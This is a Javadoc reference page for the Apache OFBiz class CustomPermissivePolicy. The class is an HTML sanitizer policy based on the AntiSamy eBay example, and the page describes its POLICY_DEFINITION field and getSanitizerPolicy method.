Class CustomPermissivePolicy

java.lang.Object
org.apache.ofbiz.base.html.CustomPermissivePolicy
All Implemented Interfaces:
SanitizerCustomPolicy

public class CustomPermissivePolicy extends Object implements SanitizerCustomPolicy
Based on the AntiSamy EBay example. eBay (http://www.ebay.com/) is the most popular online auction site in the universe, as far as I can tell. It is a public site so anyone is allowed to post listings with rich HTML content. It's not surprising that given the attractiveness of eBay as a target that it has been subject to a few complex XSS attacks. Listings are allowed to contain much more rich content than, say, Slashdot- so it's attack surface is considerably larger. The following tags appear to be accepted by eBay (they don't publish rules): <a>,...
  • Field Summary

    Fields
    Modifier and Type
    Field
    Description
    static final org.owasp.html.PolicyFactory
    A policy that can be used to produce policies that sanitize to HTML sinks via PolicyFactory.apply(org.owasp.html.HtmlStreamEventReceiver).
  • Constructor Summary

    Constructors
    Constructor
    Description
     
  • Method Summary

    Modifier and Type
    Method
    Description
    org.owasp.html.PolicyFactory
    Used for getting the policy from the custom class which implements this interface

    Methods inherited from class java.lang.Object

    clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait
  • Field Details

    • POLICY_DEFINITION

      public static final org.owasp.html.PolicyFactory POLICY_DEFINITION
      A policy that can be used to produce policies that sanitize to HTML sinks via PolicyFactory.apply(org.owasp.html.HtmlStreamEventReceiver).
  • Constructor Details

    • CustomPermissivePolicy

      public CustomPermissivePolicy()
  • Method Details

    • getSanitizerPolicy

      public org.owasp.html.PolicyFactory getSanitizerPolicy()
      Description copied from interface: SanitizerCustomPolicy
      Used for getting the policy from the custom class which implements this interface
      Specified by:
      getSanitizerPolicy in interface SanitizerCustomPolicy
      Returns:
      the policy specified in the class will be returned